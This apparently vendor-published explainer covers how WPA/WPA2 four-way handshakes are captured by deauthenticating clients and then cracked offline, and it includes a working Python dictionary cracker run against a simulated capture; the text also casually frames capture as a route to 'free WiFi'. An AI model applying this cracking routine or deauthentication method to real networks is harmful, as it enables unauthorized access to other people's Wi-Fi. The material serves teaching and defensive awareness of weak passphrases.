WPA Handshake

How do hackers or remote attackers easily obtain the WPA or WPA2 handshake from a wireless access point?

By launching a deauthentication flood (a so-called "wifi bomb") they force every associated client off the access point for a few seconds.

The clients' software reconnects automatically, and the attacker sniffs the four-way handshake that is exchanged during that reconnection.

The attacker can then leave the area and brute-force the capture offline, testing a wordlist of a billion or more candidate passphrases against it without sending another packet to the network.

A handshake is basically an automatic negotiation between two entities, usually your computer and the network server it wants to connect to, although it could also be your printer connecting to your PC or your phone doing the same thing. It is the procedure that sets the configuration and parameters needed to make the communication channel run smoothly without manually entering settings every time you connect heterogeneous systems or machines. One example of handshaking that almost any Internet user is familiar with is that of modems connecting to one another.

Communication Negotiation 

When a connection is first established between two modems, the two sides negotiate communication limits and boundaries for a brief period. The infamous "squealing" noise that old dial-up modems with speaker outputs make (a sound whose pitch changes many times a second) is the audible manifestation of the two modems performing the handshake. Once every parameter has been agreed upon, those parameters are used to carry data over the channel as efficiently as its capacity and quality allow.

Free High Quality Wifi

Although handshakes are more often than not what hackers need to capture in order to gain unauthorized access to networks, or at the very least to get free WiFi of higher quality than the coffee shop or library offers, the handshake itself is a necessary and unavoidable step in bringing two otherwise different and normally mismatched systems together. A Wi-Fi Protected Access (WPA) handshake, then, is the negotiation between a client and a WiFi access point that uses WPA to keep intruders and unauthorized users off the network. In WPA and WPA2 this is the four-way handshake, which confirms that both sides hold the same pre-shared key and derives the session keys for the chosen cipher (TKIP under the original WPA, AES-CCMP under WPA2).

WPA Handshake Exploit

As for using WPA handshakes to break into networks, there are a variety of methods suited to the task. A hacker who wants to capture a four-way handshake passively will probably have to watch the wireless traffic for hours on end, waiting patiently for a client to join the network. An easier way to capture handshakes involves the Aircrack-ng suite and forced deauthentication of an already connected client, so that it reconnects to the access point exactly when the attacker is ready to capture.

Authentication Capture

Ironically enough, it is during the procedure in which the session keys are re-negotiated that a connection is most exposed to attack: the very process needed to protect the network opens it up, like barging into a house while someone is in the middle of bolting the doors. Once the full four-way handshake between the client and the access point has been captured, the hacker does not obtain the key directly; the passphrase itself is never transmitted. What the capture does provide is the pair of nonces and a message integrity code (MIC) computed from keys derived from the passphrase, which is enough to check candidate passphrases offline, one after another, until the MIC matches. A weak passphrase therefore falls to a dictionary attack, and the attacker then holds the key to the previously impenetrable network.
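The offline step described in the question and answer at the top of this page and in the paragraph above, as an added example that is not SecPoint's code and not part of Aircrack-ng. The SSID, MAC addresses, nonces and wordlist are constructed values, and the "capture" is simulated by having the client side compute message 2 of the four-way handshake from a chosen passphrase, so the script runs offline with only the Python standard library. It assumes a WPA2/CCMP handshake (key descriptor version 2, HMAC-SHA1 MIC); the original WPA/TKIP variant uses HMAC-MD5 for the MIC and is not handled here.

```python
import hashlib
import hmac
from dataclasses import dataclass
from typing import Iterable, Optional

# Constructed sample values (not from any real capture); fixed so the run is reproducible.
SSID = b"SecPointDemo"
AP_MAC = bytes.fromhex("001122334455")
CLIENT_MAC = bytes.fromhex("66778899aabb")
ANONCE = bytes(range(0x10, 0x30))  # 32-byte AP nonce, arbitrary
SNONCE = bytes(range(0x40, 0x60))  # 32-byte client nonce, arbitrary

MIC_OFFSET = 81  # byte offset of the 16-byte Key MIC field inside an EAPOL-Key frame


def pmk_from_passphrase(passphrase: str, ssid: bytes) -> bytes:
    """WPA/WPA2-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 32 bytes).
    This is the expensive step and the only thing slowing down a billion-entry wordlist."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"), ssid, 4096, 32)


def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    """IEEE 802.11 PRF-512: concatenated HMAC-SHA1 blocks, truncated to 64 bytes."""
    out = b""
    for i in range(4):
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:64]


def derive_ptk(pmk: bytes, ap_mac: bytes, client_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK from PMK, both MAC addresses and both nonces; the first 16 bytes are the KCK
    that keys the handshake MIC."""
    data = (min(ap_mac, client_mac) + max(ap_mac, client_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf_512(pmk, b"Pairwise key expansion", data)


def build_eapol_msg2(snonce: bytes) -> bytearray:
    """Minimal EAPOL-Key message 2 (client -> AP) with the MIC field zeroed.
    Layout: EAPOL version, type 3 (Key), length, then the RSN key descriptor."""
    body = (b"\x02"            # descriptor type 2 = RSN (WPA2)
            + b"\x01\x0a"      # key info: version 2 (HMAC-SHA1 MIC), pairwise, MIC bit
            + b"\x00\x10"      # key length 16 (CCMP)
            + b"\x00" * 8      # replay counter
            + snonce           # key nonce (SNonce)
            + b"\x00" * 16     # key IV
            + b"\x00" * 8      # key RSC
            + b"\x00" * 8      # key ID / reserved
            + b"\x00" * 16     # key MIC (zero while it is being computed)
            + b"\x00\x00")     # key data length
    return bytearray(b"\x01\x03" + len(body).to_bytes(2, "big") + body)


def compute_mic(kck: bytes, eapol_frame: bytes) -> bytes:
    """WPA2 (descriptor version 2): MIC = HMAC-SHA1(KCK, frame with MIC zeroed)[:16]."""
    zeroed = bytearray(eapol_frame)
    zeroed[MIC_OFFSET:MIC_OFFSET + 16] = b"\x00" * 16
    return hmac.new(kck, bytes(zeroed), hashlib.sha1).digest()[:16]


@dataclass(frozen=True)
class CapturedHandshake:
    ssid: bytes
    ap_mac: bytes
    client_mac: bytes
    anonce: bytes
    snonce: bytes
    eapol_msg2: bytes  # full frame including the MIC the client sent


def simulate_capture(true_passphrase: str) -> CapturedHandshake:
    """Stand-in for the sniffed reconnection: the client builds message 2 from the real
    passphrase and the attacker records it. Note that only the MIC goes on the air."""
    kck = derive_ptk(pmk_from_passphrase(true_passphrase, SSID), AP_MAC, CLIENT_MAC, ANONCE, SNONCE)[:16]
    frame = build_eapol_msg2(SNONCE)
    frame[MIC_OFFSET:MIC_OFFSET + 16] = compute_mic(kck, frame)
    return CapturedHandshake(SSID, AP_MAC, CLIENT_MAC, ANONCE, SNONCE, bytes(frame))


def crack_handshake(hs: CapturedHandshake, wordlist: Iterable[str]) -> Optional[str]:
    """Offline dictionary attack: PMK -> PTK -> KCK for each candidate, then compare the
    recomputed MIC with the captured one. Nothing is decrypted and the AP is never contacted."""
    captured_mic = hs.eapol_msg2[MIC_OFFSET:MIC_OFFSET + 16]
    for candidate in wordlist:
        kck = derive_ptk(pmk_from_passphrase(candidate, hs.ssid),
                         hs.ap_mac, hs.client_mac, hs.anonce, hs.snonce)[:16]
        if hmac.compare_digest(compute_mic(kck, hs.eapol_msg2), captured_mic):
            return candidate
    return None


if __name__ == "__main__":
    wordlist = ["password", "12345678", "letmein1", "coffeeshop", "Spring2015!"]  # constructed
    print("weak passphrase recovered:", crack_handshake(simulate_capture("coffeeshop"), wordlist))
    print("random passphrase recovered:", crack_handshake(simulate_capture("k7#Qw9!zR2vLp"), wordlist))
```

The capture is useful to the attacker only as an oracle: each guess costs one PBKDF2 run of 4096 HMAC-SHA1 iterations plus a cheap PTK derivation and MIC check, and a passphrase that is not in the wordlist is never found. That is the whole reason the network owner's passphrase length and randomness, not the cipher, decides whether a captured handshake leads anywhere.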

SecPoint® © Copyright 1999-2015
US Toll Free: +1-855-489-3724 - EU Toll Free: +44-808-101-2272